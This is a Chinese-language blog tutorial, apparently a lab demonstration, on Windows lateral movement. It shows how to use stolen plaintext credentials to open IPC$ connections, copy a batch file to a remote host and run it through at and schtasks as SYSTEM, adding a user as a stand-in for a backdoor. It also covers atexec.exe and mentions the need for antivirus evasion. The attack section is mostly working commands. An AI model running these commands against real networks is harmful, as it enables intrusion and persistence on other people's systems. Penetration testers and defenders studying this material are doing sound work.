横向移动-传递攻击at&schtasks

横向移动就是拿下对方一台主机后,以拿下的那台主机作为跳板,对内网的其他主机再进行后渗透,拿到其他内网主机的权限的过程。叫做横向移动。横向移动的主要目的就是扩大战果。

传递攻击主要建立在明文和hash值获取基础上进行攻击。

at和schtasks主要作用就是在已知目标系统用户的明文密码基础上,直接可以在远程主机上执行命令。

at 命令 < win2012   小于win2012才有at命令

schtasks 命令>= win2012  大于或等于win2012 是 schtasks 命令

在使用at和schtasks的前              提

我们需要建立ipc链接到对方主机,对方需要开启了ipc共享,开启了139,445端口。

at

这里做一下演示。

拿到对方的账户名密码后,我们建立ipc链接。

net use \\192.168.52.129\ipc$ P@ssw0rd /user:god\liukaifeng01


net use \\对方主机ip\ipc$ 密码 /user:用户名           (有域)
net use \\对方主机ip\ipc$ 密码 /user:用户名\域名      (有域)

这里演示的是链接域控,所以有域

net use

查看一下当前的链接

ipc建立成功

我们通过ipc链接传入一个bat文件(这里只做演示,如果是实战就是传入后门)我的bat内容是创建用户yx

copy 1.bat \\192.168.52.129\c$   

这里要搞清楚自己的目录和对方的目录

然后用到at命令给对方主机一个计划任务

C:\>at \\192.168.52.129 15:58 c:\1.bat

然后去对方主机看看

 

bat文件被copy到了对方主机

计划任务启动bat也成功执行。

ipc链接建立是开启对方开启139,445端口 但是有时候执行at命令会报错

总结了以下报错原因

建立 IPC 常见的错误代码

(1)5:拒绝访问,可能是使用的用户不是管理员权限,需要先提升权限

(2)51:网络问题,Windows 无法找到网络路径

(3)53:找不到网络路径,可能是 IP 地址错误、目标未开机、目标 Lanmanserver 服务未启动、有 防火墙等问题

(4)67:找不到网络名,本地 Lanmanworkstation 服务未启动,目标删除 ipc$

(5)1219:提供的凭据和已存在的凭据集冲突,说明已建立 IPC$,需要先删除

(6)1326:账号密码错误

(7)1792:目标 NetLogon 服务未启动,连接域控常常会出现此情况

(8)2242:用户密码过期,目标有账号策略,强制定期更改密码

建立 IPC 失败的原因

(1)目标系统不是 NT 或以上的操作系统

(2)对方没有打开 IPC$共享

(3)对方未开启 139、445 端口,或者被防火墙屏蔽

(4)输出命令、账号密码有错误

schtasks

schtasks命令也是相当于写计划任务,at命令在win2012之后就弃用了,改为了schtasks

首先还是得建立ipc链接

net use \\192.168.52.140\ipc$ "P@ssw0rd" /user:administrator

然后把文件copy到对方

创建任务

schtasks /create /s 192.168.52.140 /ru "SYSTEM" /tn adduser /sc DAILY /tr c:\文件 /F


adduser是任务名

启动任务

schtasks /run /s 192.168.52.140 /tn adduser /i 

然后去win2012检查一下

yx用户建立成功

另外介绍一个第三方工具

atexec.exe

 这玩意人家都给你写好了,但是是第三方工具,不免杀。需要做一下免杀。

直接用,自带提权

atexec.exe ./administrator:Admin12345@192.168.3.21 "whoami"
无域
atexec.exe god/administrator:Admin12345@192.168.3.21 "whoami"
有域

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
IPC(Inter-Process Communication)是进程间通信的一种机制,用于不同进程之间的数据交换和通信。它可以在同一台计算机上的不同进程之间进行通信,也可以在不同计算机上的进程之间进行通信。 Psexec是一款Windows系统下的命令行工具,它可以在远程计算机上执行命令或程序。通过Psexec,管理员可以在本地计算机上远程启动一个命令行窗口,并在远程计算机上执行命令或程序。 WMI(Windows Management Instrumentation)是一种用于管理和监控Windows操作系统的技术。它提供了一组API和服务,用于获取和设置操作系统的各种信息,包括硬件信息、软件信息、系统配置等。通过WMI,管理员可以通过编程方式管理和监控远程计算机。 Schtasks是Windows操作系统中的一个命令行工具,用于创建、修改、删除和查询计划任务。计划任务是指在指定的时间或事件发生时自动执行的任务。通过Schtasks,管理员可以通过命令行方式管理计划任务。 AT(Scheduled Task)是Windows操作系统中的一个命令行工具,用于创建和管理计划任务。与Schtasks类似,AT也可以用于在指定的时间或事件发生时自动执行任务。 SC(Service Control)是Windows操作系统中的一个命令行工具,用于管理Windows服务。通过SC,管理员可以启动、停止、暂停、继续、查询和修改Windows服务的状态和配置。 WINRM(Windows Remote Management)是一种用于远程管理Windows系统的协议和服务。它提供了一组API和服务,用于远程执行命令、获取和设置系统信息、配置和管理Windows服务等。通过WINRM,管理员可以通过网络远程管理和监控Windows系统。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值